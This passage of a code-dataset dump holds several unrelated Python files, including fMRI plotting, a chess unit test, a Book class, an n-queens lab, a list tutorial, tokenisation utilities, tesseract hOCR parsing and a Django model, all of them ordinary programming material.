default atlas (= set of ROI)\n atlas = datasets.fetch_atlas_harvard_oxford(params.atlas)\n labels = atlas['labels']\n maps = nilearn.image.load_img(atlas['maps'])\n\n # extract data\n for index_mask in range(len(labels)-1):\n mask = math_img('img > 50', img=index_img(maps, index_mask)) \n masker = NiftiMasker(mask_img=mask, memory='nilearn_cache', verbose=5)\n masker.fit()\n for analysis in analysis_parameters['scatter_plots']:\n for subject in 
subjects:\n subject = Subjects().get_subject(int(subject))\n model1 = [os.path.join(paths.path2derivatives, source, analysis['input_data_folder1'], language, analysis['model1_folder'], analysis['model1']+ '_' + subject + '.nii.gz')]\n model2 = [os.path.join(paths.path2derivatives, source, analysis['input_data_folder2'], language, analysis['model2_folder'], analysis['model2'] + '_' + subject + '.nii.gz')]\n analysis_name = analysis['name']\n x = masker.transform(model1) # you should include confounds\n y = masker.transform(model2)\n\n # save plots\n plt.figure(i)\n plt.scatter(x, y, c='red', marker='.')\n plt.scatter([np.mean(x)], [np.mean(y)], c='green', label='Average value')\n plt.scatter(x, y-x, c='black', label='increase in r2')\n plt.scatter([np.percentile(x, 50)], [np.percentile(y, 50)], c='blue', label='Median value')\n plt.title('\\n'.join(wrap('{} in {}'.format(analysis['title'], labels[index_mask+1]))))\n plt.xlabel('\\n'.join(wrap('{}'.format(analysis['x_label']))))\n plt.ylabel('\\n'.join(wrap('{}'.format(analysis['y_label']))))\n #plt.xlim(0,0.2)\n #plt.ylim(0,0.2)\n plt.plot([max([np.min(x), np.min(y)]), min([np.max(x), np.max(y)])], [max([np.min(x), np.min(y)]), min([np.max(x), np.max(y)])], c='blue')\n plt.axhline(y=0., color='blue', linestyle='-')\n plt.legend()\n save_folder = os.path.join(paths.path2derivatives, source, 'analysis', language, 'scatter_plots', analysis_name)\n check_folder(save_folder)\n plt.savefig(os.path.join(save_folder, analysis['title'] + ' - ' + labels[index_mask+1] + ' - ' + subject + '.png'))\n plt.close()\n i+=1\n \n\n ##########################################################################\n ############################## Check models ##############################\n ##########################################################################\n \n if 'check_model' in args.analysis[0]:\n # retrieve default atlas (= set of ROI)\n atlas = datasets.fetch_atlas_harvard_oxford(params.atlas)\n labels = atlas['labels']\n maps = 
nilearn.image.load_img(atlas['maps'])\n\n # extract data\n for index_mask in range(len(labels)-1):\n mask = math_img('img > 50', img=index_img(maps, index_mask)) \n masker = NiftiMasker(mask_img=mask, memory='nilearn_cache', verbose=5)\n masker.fit()\n for analysis in analysis_parameters['check_model']:\n for subject in subjects:\n subject = Subjects().get_subject(int(subject))\n model = [os.path.join(paths.path2derivatives, source, 'ridge-indiv', language, analysis['model'], 'ridge-indiv_{}_'.format(language) + analysis['model'] + '_' + analysis['name'] + '_' + subject + '.nii.gz')]\n analysis_name = analysis['name']\n x = masker.transform(model).reshape(-1) # you should include confounds\n\n # save plots\n plt.figure(i)\n plt.hist(x, color = 'blue', edgecolor = 'black', bins = 100)\n\n plt.title('\\n'.join(wrap('{} in {}'.format(analysis['title'], labels[index_mask+1]))))\n plt.xlabel('\\n'.join(wrap('R2 of {}'.format(analysis['model_name']))))\n plt.ylabel('\\n'.join(wrap('Density')))\n plt.xlim(0,0.2)\n plt.legend()\n save_folder = os.path.join(paths.path2derivatives, source, 'analysis', language, 'check_model')\n check_folder(save_folder)\n plt.savefig(os.path.join(save_folder, analysis_name + ' - ' + labels[index_mask+1] + ' - ' + subject + '.png'))\n plt.close()\n i+=1\n \n\n\n\n\n ###########################################################################\n ################## Model complexity impact on regression ##################\n ###########################################################################\n # x: complexity variable\n # y_list: list of list of values for each subject [sub1_list, sub2_list, ...]\n # sub1_list: list of values (perplexity, r2 distribution, ...) 
for a given subject\n if 'model_complexity' in args.analysis[0]:\n mask = mean_img(load_img(args.default_mask))\n mask = math_img('img > 50', img=mask)\n masker = NiftiMasker(mask_img=mask, memory='nilearn_cache', verbose=5)\n masker.fit()\n \n for analysis in analysis_parameters['model_complexity']:\n analysis_name = analysis['name']\n x = analysis['complexity_variable']\n if analysis['variable_of_interest'] not in ['r2_test', 'significative_r2_100']:\n y_list = list(zip(*analysis['value_v-o-i'])) # list of list of subject values [sub1_list, sub2_list, ...]\n y = np.mean(analysis['value_v-o-i'], axis=1)\n plt.figure(i)\n plt.plot(x, y)\n plt.title('\\n'.join(wrap(analysis['title'])))\n plt.xlabel('\\n'.join(wrap(analysis['variable_name'])))\n plt.ylabel('\\n'.join(wrap(analysis['variable_of_interest'])))\n plt.legend()\n save_folder = os.path.join(paths.path2derivatives, source, 'analysis', language, 'model_complexity')\n check_folder(save_folder)\n plt.savefig(os.path.join(save_folder, analysis_name + ' - ' + analysis['variable_of_interest'] + ' = f(' + analysis['variable_name'] + ') - ' + subject + '.png'))\n plt.close()\n i+=1\n else:\n y_list = []\n for subject in subjects:\n significant_values = [np.load(mask).sum() for mask in analysis['mask']]\n max_values = []\n y_sub = []\n subject = Subjects().get_subject(int(subject))\n for var in analysis['complexity_variable']:\n # extract data\n model_name = '_'.join([analysis['model_category'].lower(), \n 'wikikristina', \n 'embedding-size', str(var if analysis['variable_name']=='ninp' else analysis['parameters']['ninp']),\n 'nhid', str(var if analysis['variable_name']=='nhid' else analysis['parameters']['nhid']),\n 'nlayers', str(var if analysis['variable_name']=='nlayers' else analysis['parameters']['nlayers']),\n 'dropout', str(var if analysis['variable_name']=='dropout' else analysis['parameters']['dropout']).replace('.', ''),\n analysis['parameters']['which']])\n path = os.path.join(paths.path2derivatives, 
source, 'ridge-indiv', language, model_name)\n file_name = '_'.join(['ridge-indiv', \n language, analysis['model_category'].lower(),\n 'wikikristina', \n 'embedding-size', str(var if analysis['variable_name']=='ninp' else analysis['parameters']['ninp']), \n 'nhid', str(var if analysis['variable_name']=='nhid' else analysis['parameters']['nhid']),\n 'nlayers', str(var if analysis['variable_name']=='nlayers' else analysis['parameters']['nlayers']),\n 'dropout', str(var if analysis['variable_name']=='dropout' else analysis['parameters']['dropout']).replace('.', ''),\n analysis['parameters']['which'],\n analysis['variable_of_interest'],\n str('pca_' + str(var) if analysis['variable_name']=='pca' else analysis['parameters']['pca']),\n analysis['parameters']['voxel_wise'],\n subject + '.nii.gz'])\n path2file = os.path.join(path, file_name)\n y_sub.append(masker.transform(path2file)[0])\n max_values.append(np.max(y_sub[-1]))\n plt.figure(i)\n plt.boxplot(y_sub, positions=x, sym='', widths=5, meanline=True, showmeans=True)\n plt.title('\\n'.join(wrap(analysis['title'] + ' - ' + subject)))\n plt.xlabel('\\n'.join(wrap(analysis['variable_name'])))\n plt.ylabel('\\n'.join(wrap(analysis['variable_of_interest'])))\n plt.legend()\n save_folder = os.path.join(paths.path2derivatives, source, 'analysis', language, 'model_complexity')\n check_folder(save_folder)\n plt.savefig(os.path.join(save_folder, analysis_name + ' - ' + analysis['variable_of_interest'] + ' = f(' + analysis['variable_name'] + ') - ' + subject + '.png'))\n plt.close()\n i += 1\n\n fig, ax1 = plt.subplots()\n plt.title('\\n'.join(wrap('Count R2>0 + R2 max' ' - ' + subject)))\n\n color = 'tab:red'\n ax1.set_xlabel('\\n'.join(wrap(analysis['variable_name'])))\n ax1.set_ylabel('\\n'.join(wrap('count')), color=color)\n ax1.plot(x, significant_values, color=color)\n ax1.tick_params(axis='y', labelcolor=color)\n\n ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\n\n color = 'tab:blue'\n 
ax2.set_ylabel('\\n'.join(wrap('R2 max')), color=color) # we already handled the x-label with ax1\n ax2.plot(x, max_values, color=color)\n ax2.tick_params(axis='y', labelcolor=color)\n\n fig.tight_layout()\n plt.legend()\n save_folder = os.path.join(paths.path2derivatives, source, 'analysis', language, 'model_complexity')\n check_folder(save_folder)\n plt.savefig(os.path.join(save_folder, analysis_name + ' - ' + analysis['variable_of_interest'] + ' non zero values count' + ' - ' + subject + '.png'))\n plt.close()\n\n i += 1\n y_list.append(y_sub) # you should include confounds\n\n\n\n # save plots\n plt.figure(i)\n plt.boxplot(np.ndarray.tolist(np.mean(np.array(y_list), axis=0)), positions=x)\n plt.title('\\n'.join(wrap(analysis['title'] + ' - ' + subject)))\n plt.xlabel('\\n'.join(wrap(analysis['variable_name'])))\n plt.ylabel('\\n'.join(wrap(analysis['variable_of_interest'])))\n plt.legend()\n save_folder = os.path.join(paths.path2derivatives, source, 'analysis', language, 'model_complexity')\n check_folder(save_folder)\n plt.savefig(os.path.join(save_folder, analysis_name + ' - ' + analysis['variable_of_interest'] + ' = f(' + analysis['variable_name'] + ') - ' + 'averaged_accross_subjects' + '.png'))\n plt.close()\n plt.close()\n i += 1\n\n ###########################################################################\n ############################ Specific analysis ############################\n ###########################################################################\n if 'specific_analysis' in args.analysis[0]:\n window_size_beg = 0\n window_size_end = 20\n color_map = {'entropy': 'tab:red',\n 'surprisal': 'tab:blue'}\n analysis_name = 'Entropy - Surprisal'\n for subject in subjects:\n subject = Subjects().get_subject(int(subject))\n for model in analysis_parameters['specific_analysis']:\n for run in range(1, params.nb_runs + 1):\n path = os.path.join(paths.path2data, model['data'].format(run))\n iterator = tokenize(path, language)\n x = 
np.arange(len(iterator))[window_size_beg:window_size_end]\n\n def get_path(name, model):\n model_name = '_'.join([model['parameters']['model_category'].lower(), \n 'wikikristina', \n 'embedding-size', str(model['parameters']['ninp']),\n 'nhid', str(model['parameters']['nhid']),\n 'nlayers', str(model['parameters']['nlayers']),\n 'dropout', str(model['parameters']['dropout']).replace('.', ''),\n model['parameters']['other'].format(name)])\n path = os.path.join(paths.path2derivatives, source, 'raw-features', language, model_name)\n file_name = '_'.join(['raw-features', \n language, model['parameters']['model_category'].lower(),\n 'wikikristina', \n 'embedding-size', str(model['parameters']['ninp']),\n 'nhid', str(model['parameters']['nhid']),\n 'nlayers', str(model['parameters']['nlayers']),\n 'dropout', str(model['parameters']['dropout']).replace('.', ''),\n model['parameters']['other'].format(name),\n 'run{}.csv'.format(run)])\n return os.path.join(path, file_name)\n\n y_ent = pd.read_csv(get_path('entropy', model))['entropy'][window_size_beg:window_size_end]\n y_sur = pd.read_csv(get_path('surprisal', model))['surprisal'][window_size_beg:window_size_end]\n \n fig, ax1 = plt.subplots()\n plt.xticks(x, iterator[window_size_beg:window_size_end], rotation=90)\n plt.title('\\n'.join(wrap('Entropy & Surprisal' + ' - ' + subject)))\n color = color_map['entropy']\n ax1.set_xlabel('\\n'.join(wrap('Le Petit Prince text')))\n ax1.set_ylabel('\\n'.join(wrap('Entropy')), color=color)\n ax1.plot(x, y_ent, color=color)\n plt.legend()\n ax1.tick_params(axis='y', labelcolor=color)\n\n ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\n color = color_map['surprisal']\n ax2.set_ylabel('\\n'.join(wrap('Surprisal')), color=color) # we already handled the x-label with ax1\n ax2.plot(x, -y_sur, color=color)\n ax2.tick_params(axis='y', labelcolor=color)\n fig.tight_layout()\n plt.legend()\n ax = plt.gca()\n ax.grid(True, which='both')\n # plt.grid(which='both')\n 
save_folder = os.path.join(paths.path2derivatives, source, 'analysis', language, 'specific_analysis')\n check_folder(save_folder)\n plt.savefig(os.path.join(save_folder, analysis_name + ' - ' + 'window_size_' + str(window_size_end-window_size_beg) + ' - ' + subject + 'run{}.png'.format(run)))\n plt.close()\n i += 1\n\n","sub_path":"fMRI/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":19486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"29481711","text":"import unittest\nimport sys\nsys.path.insert(0, \"../../src/Model/\")\nfrom PieceColor import PieceColor\nfrom Pon import Pon\nfrom Knight import Knight\nfrom Bishop import Bishop\nfrom Rook import Rook\nfrom Queen import Queen\nfrom King import King\nfrom Board import Board\nfrom EatMove import EatMove\n\nclass TestEatMove(unittest.TestCase):\n def setUp(self):\n self.color = PieceColor.LIGHT\n self.otherColor = PieceColor.DARK\n self.board = Board( 8, 8 )\n\n def test_EatMove_Pon(self):\n pon = Pon( self.color )\n self.board.addPiece( ( 2, 2 ), pon )\n self.board.addPiece( ( 3, 3 ), Knight( self.otherColor ) )\n self.board.move( EatMove( self.board, ( 2, 2 ), ( 3, 3 ) ) )\n self.assertEqual( self.board.getPiece( ( 3, 3 ) ), pon )\n self.assertEqual( self.board.getPiece( ( 2, 2 ) ), None )\n\n def test_EatMove_Pon_undo(self):\n pon = Pon( self.color )\n self.board.addPiece( ( 2, 2 ), pon )\n target = Knight( self.otherColor )\n self.board.addPiece( ( 3, 3 ), target )\n self.assertFalse( pon.getHasMoved() )\n move = EatMove( self.board, ( 2, 2 ), ( 3, 3 ) )\n self.board.move( move )\n self.assertTrue( pon.getHasMoved() )\n self.assertEqual( self.board.getPiece( ( 3, 3 ) ), pon )\n self.assertEqual( self.board.getPiece( ( 2, 2 ) ), None )\n self.board.undo( move )\n self.assertEqual( self.board.getPiece( ( 2, 2 ) ), pon )\n self.assertEqual( self.board.getPiece( ( 3, 3 ) ), target )\n self.assertFalse( pon.getHasMoved() )\n\nif 
__name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/Model/TestEatMove.py","file_name":"TestEatMove.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"604243592","text":"\"\"\"Implements the Book class containing the title, author, and page count.\"\"\"\n# Create your Book class in this file\n\n\nclass Book:\n \"\"\"Implements the Book class.\"\"\"\n\n def __init__(self, title='', author='', pages=0, is_completed=False):\n self.title = title\n self.author = author\n self.number_of_pages = int(pages)\n if isinstance(is_completed, bool):\n self.is_completed = is_completed\n elif is_completed in {'r', 'c'}:\n self.is_completed = True if is_completed == 'c' else False\n else:\n raise ValueError\n\n def __str__(self):\n return '{0} by {1}, {2} pages {3}'.format(\n self.title or '\"Empty Book\"',\n self.author or 'Unknown author',\n self.number_of_pages,\n '(completed)' if self.is_completed else '',\n )\n\n def str2csv(self):\n \"\"\"Prepare book data for csv file.\"\"\"\n return ','.join((\n self.title,\n self.author,\n str(self.number_of_pages),\n 'c' if self.is_completed else 'r'\n ))\n\n def mark_required(self):\n \"\"\"Mark the book as required.\"\"\"\n self.is_completed = False\n\n def mark_completed(self):\n \"\"\"Mark the book as completed.\"\"\"\n self.is_completed = True\n\n def is_long(self):\n \"\"\"Book length Test.\"\"\"\n return self.number_of_pages > 500\n","sub_path":"book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"353183812","text":"from tkinter import * \nwindow = Tk()\nnumber1 = False\nnumber2 = False\n\n\ndef number1Int():\n global number1\n if number1 == True:\n number1 = False\n else:\n number1 = True \n print(number1)\n\ndef number2Int():\n global number2\n if number2 == True:\n number2 = False\n else:\n number2 
= True \n print(number2)\n\nbutton1 = Button(window, command = number1Int,text=\"1\")\nbutton1.pack()\nbutton2 = Button(window, command = number2Int,text=\"2\")\nbutton2.pack()\n\nwindow.mainloop()","sub_path":"tkTest/tkInterButtonGUI.py","file_name":"tkInterButtonGUI.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"210533750","text":"\"\"\"\r\nModule with the methods of lab4\r\n:author: Juan Ortiz\r\n\"\"\"\r\nimport time\r\ndef valid(board):\r\n \"\"\"\r\n Determines if a board is a valid n-queens solution\r\n :param board: board with the queens\r\n :return: returns True if the board is a n-queens solution\r\n \"\"\"\r\n for i in range(len(board)):\r\n for j in range(len(board)):\r\n if i == j:\r\n continue\r\n else:\r\n if (board[i] - board[j]) == (i - j):\r\n return False\r\n if (board[j] - board[i]) == (i - j):\r\n return False\r\n else:\r\n return True\r\n\r\ndef p_queens(board, n):\r\n \"\"\"\r\n Taken from https://stackoverflow.com/questions/2710713/algorithm-to-generate-all-possible-permutations-of-a-list\r\n Calculates all the possible permutations of an array without repeating\r\n :param board: array of which we want to know its permutations\r\n :param n: 0\r\n :return: all possible permutations\r\n \"\"\"\r\n\r\n if n + 1 >= len(board):\r\n yield board\r\n else:\r\n for p in p_queens(board, n + 1):\r\n yield p\r\n for i in range(n + 1, len(board)):\r\n board[n], board[i] = board[i], board[n]\r\n for p in p_queens(board, n + 1):\r\n yield p\r\n board[n], board[i] = board[i], board[n]\r\n\r\n\r\ndef n_queens(n):\r\n \"\"\"\r\n Gives the number of solutions for the queens problem using brute force\r\n :param n: number of queens or size of the board\r\n :return: returns an integer that represents the number of solutions for the given n queens\r\n \"\"\"\r\n if n == 0:\r\n return 0\r\n board = list(range(n))\r\n count = 0\r\n for p in p_queens(board, 0):\r\n 
if valid(p):\r\n count += 1\r\n return count\r\n\r\n\"\"\"\r\nif __name__ == '__main__':\r\n start = time.clock()\r\n n_queens(16)\r\n end = time.clock() - start\r\n print(\"n_queens took:\", end*1000, \"ms\")\r\n\"\"\"","sub_path":"laboratorios/lab02/codigo/Python/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"481314976","text":"# Lists\n\ncourses = ['Maths', 'Science', 'Social', 'Computer', 'Geography']\ncourses_new = ['Pysics', 'Chemistry']\nnums = [1, 6, 2, 7, 8, 3]\n\n# print(courses)\n# print(len(courses))\n\n\n# Indexing\n# print(courses[0])\n# print(courses[1])\n# print(courses[2])\n# print(courses[3])\n# print(courses[4])\n\n# Negative Index\n# print(courses[-1])\n\n# Range Index\n# print(courses[0:3])\n# print(courses[2:])\n\n# Append to List\n# courses.append('Arts')\n# courses.remove('Maths')\n# courses.insert(1, 'Arts')\n\n# Remove the last Item in the List. 
i.e Geography\npopped = courses.pop()\nprint(popped)\nprint(courses)\n# print(courses_new)\n\n# Merging two Lists\n# courses.extend(courses_new)\n# print(courses)\n\n\n# Sorting the Lists\n# courses.reverse()\n# print(courses)\n\n# courses.sort()\n# print(courses)\n\n# nums.sort()\n# print(nums)\n\n# nums.sort(reverse=True)\n# print(nums)\n\n\n# Sorted version of lists without altering actual Position\n# sorted_nums = sorted(nums)\n# print(sorted_nums)\n#\n# print(min(nums))\n# print(max(nums))\n# print(sum(nums))\n\n\n# Search Functions for Lists\n# print(courses.index('Geography'))\n# print('Maths' in courses)\n\n# for item in courses:\n# print(item)\n\n# for index, course in enumerate(courses):\n# print(index, course)\n\n# for index, course in enumerate(courses, start=2):\n# print(index, course)\n\n# Lists to Strings - Join Method\n# course_str = ' , '.join(courses)\n# print(course_str)\n\n# course_str = ' - '.join(courses)\n# print(course_str)\n\n# # Strings to Lists\n# new_list = course_str.split('-')\n# print(new_list)\n\n\n# Lists are Mutable , Tuples are Immutable\n# Mutable\n# list_1 = ['History', 'Math', 'Physics', 'CompSci']\n# list_2 = list_1\n\n# print(list_1)\n# print(list_2)\n\n# list_1[0] = 'Art'\n\n# print(list_1)\n# print(list_2)\n\n# Tuples - Immutable\n# tuple_1 = ('History', 'Math', 'Physics', 'CompSci')\n# tuple_2 = tuple_1\n#\n# print(tuple_1)\n# print(tuple_2)\n#\n# tuple_1[0] = 'Art'\n#\n# print(tuple_1)\n# print(tuple_2)\n\n# Sets - Doesn't show the duplicate Values\n\n# cs_courses = {'History', 'Math', 'Physics', 'CompSci'}\n# print(cs_courses)\n\ncs_courses = {'History', 'Math', 'Physics', 'CompSci'}\ncs_courses_1 = {'History', 'Math', 'Art', 'Design'}\n\nprint(cs_courses.intersection(cs_courses_1))\nprint(cs_courses.union(cs_courses_1))\n\n# Empty Lists\n# empty_list = []\n# empty_list = list()\n\n# Empty Tuples\n# empty_tuple = ()\n# empty_tuple = tuple()\n\n# Empty Sets\n# empty_set = {} # This isn't right! 
It's a dict\n# empty_set = set()\n","sub_path":"Learning-Corey/List_Tuples_Sets.py","file_name":"List_Tuples_Sets.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"360153175","text":"import logging\nfrom pkg_resources import resource_stream\n\nimport numpy as np\n\n\nlogger = logging.getLogger(__name__)\n\n\n# TODO 添加 test 文件\nclass Vocabulary(object):\n def __init__(self) -> None:\n self._char_vocab_stream_args = [\"cnlp\", \"src/char_vocab.txt\"]\n self._word_vocab_stream_args = [\"cnlp\", \"src/word_vocab.txt\"]\n self._padding_token = \"@PAD@\"\n self._unknown_token = \"@UNK@\"\n\n @staticmethod\n def _read_vocab_from_file(vocab_path: str) -> list:\n with open(vocab_path, \"r\", encoding=\"utf-8\") as vocab_file:\n vocab_list = [_v.strip(\"\\n\") for _v in vocab_file]\n return vocab_list\n\n @staticmethod\n def _read_vocab_from_stream(stream_args: list) -> list:\n stream = resource_stream(*stream_args)\n vocab_list = [_v.decode().strip(\"\\n\") for _v in stream.readlines()]\n stream.close()\n return vocab_list\n\n def _extend_vocab(self, vocab_data: list) -> list:\n vocab_data.append(self._padding_token)\n vocab_data.append(self._unknown_token)\n return vocab_data\n\n def get_default_vocab(self, vocab_type: str = \"char\") -> list:\n if vocab_type == \"char\":\n _vocab = self._read_vocab_from_stream(self._char_vocab_stream_args)\n elif vocab_type == \"word\":\n _vocab = self._read_vocab_from_stream(self._word_vocab_stream_args)\n else:\n raise ValueError(f\"error vocab type: {vocab_type}\")\n return _vocab\n\n def token_to_index(self,\n tokens: [list, str] = None,\n max_len: int = None,\n vocab_path: str = None,\n vocab_type: str = \"char\") -> list:\n if vocab_path:\n vocab_data = self._read_vocab_from_file(vocab_path)\n else:\n vocab_data = self.get_default_vocab(vocab_type)\n vocab_data = self._extend_vocab(vocab_data)\n\n if isinstance(tokens, str):\n 
token_list = [tokens]\n elif isinstance(tokens, list):\n token_list = tokens\n else:\n raise TypeError(f\"not support this type: {type(tokens)}\")\n\n if token_list:\n if not max_len:\n # 如果 max_len 没有默认值,自动取覆盖80%数据的长度\n logger.warning(\"max length is 0 or empty, automatically take over 80% of the length of the data.\")\n token_len_list = [len(_token) for _token in token_list]\n max_len = sorted(token_len_list)[int(len(token_list) * 0.8)]\n\n index_list = []\n for token_item in token_list:\n index_array = np.zeros(max_len, dtype=int) + vocab_data.index(self._padding_token)\n if len(token_item) >= max_len:\n for token_index, token in enumerate(token_item[:max_len]):\n if token in vocab_data:\n index_array[token_index] = vocab_data.index(token)\n else:\n index_array[token_index] = vocab_data.index(self._unknown_token)\n else:\n for token_index, token in enumerate(token_item):\n if token in vocab_data:\n index_array[token_index] = vocab_data.index(token)\n else:\n index_array[token_index] = vocab_data.index(self._unknown_token)\n\n index_list.append(index_array.tolist())\n\n if isinstance(tokens, str):\n return list(index_list[0])\n else:\n return index_list\n else:\n raise ValueError(\"token_list is None or empty !\")\n\n def index_to_token(self,\n indexs: list = None,\n vocab_path: str = None,\n vocab_type: str = \"char\") -> list:\n if vocab_path:\n vocab_data = self._read_vocab_from_file(vocab_path)\n else:\n vocab_data = self.get_default_vocab(vocab_type)\n vocab_data = self._extend_vocab(vocab_data)\n max_vocab_length = len(vocab_data)\n\n token_list = []\n if indexs:\n for index_item in indexs:\n if isinstance(index_item, int):\n if index_item < max_vocab_length:\n token_list.append(vocab_data[index_item])\n else:\n token_list.append(self._unknown_token)\n elif isinstance(index_item, list):\n token = []\n for _index in index_item:\n if isinstance(_index, int):\n if _index < max_vocab_length:\n token.append(vocab_data[_index])\n else:\n 
token.append(self._unknown_token)\n else:\n raise TypeError(f\"error type data: {index_item}\")\n token_list.append(token)\n else:\n raise TypeError(f\"error type data: {index_item}\")\n\n return token_list\n else:\n raise ValueError(\"indexs is None or empty !\")\n","sub_path":"cnlp/data/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":5224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"196146948","text":"\"\"\"\ntrial to run tesser in hOCR mode and parse output\n\nalternative to running tesser in pdf mode then using pdftohtml from poppler-utils to get xml\n\nwould I get different bounding box data with a different psm ??\n\"\"\"\n\nfrom bs4 import BeautifulSoup\nimport subprocess\nimport time\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\n\n\n# todo\n# need to use opencv to scale the images\n# need to tokenise\n# experiment with some parsing\n\nexe_name = 'tesseract'\n\nimage1 = 'Im1.tiff'\nimage10 = '00018718_2011_Im10.tiff'\nimage11 = '00018718_2011_Im11.tiff'\nimage13 = '00018718_2011_Im13.tiff'\nimage15 = '00018718_2011_Im15.tiff'\n\nimages = [image1, image10, image11, image13, image15]\n\nstop_words = set(stopwords.words('english'))\nstemmer = PorterStemmer()\n\n\ndef process_call(*args):\n \"\"\"\n calls a subprocess, expects args for tesser in this app\n \"\"\"\n\n try:\n proc = subprocess.check_call(args)\n print('subprocess retcode {r}'.format(r=proc))\n except subprocess.CalledProcessError as exp:\n print('subprocess.CalledProcessError : ', exp)\n\n\ndef gen_args(images):\n \"\"\"\n create an args list\n \"\"\"\n\n oem = '-oem 2' # tesseract + cube\n psm = '-psm 1' # automatic psm with OSD -orientation and script detection => example shown\n mode = 'hocr'\n\n args = [[exe_name, img, (img[:-5]), psm, oem, mode] for img in images]\n\n print(args)\n return args\n\n\ndef ocr_files():\n\n hocr_args = gen_args(images)\n print(hocr_args)\n\n for 
arg in hocr_args:\n print(arg)\n process_call(*arg)\n\ndef ocr_simple():\n oem = '-oem 2' # tesseract + cube\n psm = '-psm 7' # automatic psm with OSD -orientation and script detection => example shown\n mode = 'hocr'\n\n arg = [exe_name, '00018718_2011_Im10.tiff', 'Im102', psm, oem, mode]\n print(arg)\n process_call(*arg)\n return\n\n\ndef parse_file(img):\n # read one of the hocr files and get the text\n with open(img, 'rt') as fn:\n hocr = fn.read()\n soup = BeautifulSoup(hocr, 'html.parser')\n words = soup.find_all('span', class_='ocrx_word')\n word_list = []\n\n for word in words:\n\n w = word.get_text().lower().replace('\\'', '')\n # print(w)\n word_list.append(w)\n if len(word_list) >= 20:\n break\n\n print(word_list)\n filtered_text = [word for word in word_list if word not in stop_words]\n print(filtered_text)\n stemmed_list = [stemmer.stem(word) for word in filtered_text]\n print(stemmed_list)\n\ndef parse_simple(img):\n # read one of the hocr files and get the text\n with open(img, 'rt') as fn:\n hocr = fn.read()\n soup = BeautifulSoup(hocr, 'html.parser')\n words = soup.find_all('span', class_='ocrx_word')\n word_list = []\n\n for word in words:\n w = word.get_text().lower().replace('\\'', '')\n bbox = word['title'].split(';')\n bbox = bbox[0].split(' ')\n bbox = tuple([int(x) for x in bbox[1:]])\n print(w, bbox)\n\n\nif __name__ == '__main__':\n\n # start_ocr = time.time()\n # ocr_files()\n # end_ocr = time.time()\n\n # start_parse = time.time()\n # for img in images:\n # new_fn = img[:-5] + '.hocr'\n # print('\\n\\nFile: {}\\n'.format(new_fn))\n # parse_file(new_fn)\n # end_parse = time.time()\n\n\n ocr_simple()\n parse_simple('Im102.hocr')\n\n\n # print('average ocr duration {} s'.format((end_ocr-start_ocr)/5))\n # print('average parse duration {} s'.format((end_parse - start_parse) / 
5))\n\n","sub_path":"Trials/tesser/tesserHOCR/hOCR_trial.py","file_name":"hOCR_trial.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"404821678","text":"# codding=utf-8\nfrom django.db import models\n\nfrom applicationgrant.models import AppGrant\n\n\nclass AppGrantRiskRound(models.Model):\n\tclass Meta:\n\t\tverbose_name = u'Ризики проекту'\n\t\tdb_table = u'appgrant_risk_rough'\n\n\tapp_parent = models.OneToOneField(AppGrant, primary_key=True,\n\t on_delete=models.CASCADE)\n\n\tris_rough_copy = models.BooleanField(\n\t\tblank=True,\n\t\tdefault=False,\n\t\thelp_text=u'Чернетка'\n\t)\n\n\nclass AppGrantRisks(models.Model):\n\tclass Meta:\n\t\tverbose_name = u'Ризики'\n\t\tdb_table = u'appgrant_risks'\n\n\tRISK = ((0, u'Внутрішній'), (1, u'Зовнішній',))\n\tPROBABILITY = ((u'Низька', u'Низька'), (u'Середня', u'Середня'), (u'Висока', u'Висока'))\n\n\tapp_parent = models.ForeignKey(\n\t\tAppGrant,\n\t\ton_delete=models.CASCADE,\n\t\tblank=False,\n\t\tnull=True\n\t)\n\trisk_o_i = models.IntegerField(\n\t\tchoices=RISK,\n\t\tblank=False\n\t)\n\trisks = models.TextField(\n\t\tverbose_name=u'Зовнішні',\n\t\tmax_length=3000,\n\t\tnull=True,\n\t\tblank=False,\n\t)\n\tprobability = models.CharField(\n\t\tmax_length=50,\n\t\tchoices=PROBABILITY,\n\t\tblank=False\n\t)\n\tstrategy = models.TextField(\n\t\tverbose_name=u'Стратегія мінімалізації ризиків зовнішніх',\n\t\tmax_length=3000,\n\t\tnull=True,\n\t\tblank=False,\n\t)\n","sub_path":"applicationgrant/models/app_grant_risk.py","file_name":"app_grant_risk.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"160358916","text":"import sys, os\nsys.pathappend(os.pardir)\nimport numpy as np\n\nfrom common.layers import *\nfrom common.gradient import numerical_gradient\nfrom collections import OrderedDict\n\nclass TwoLayerNet:\n def 
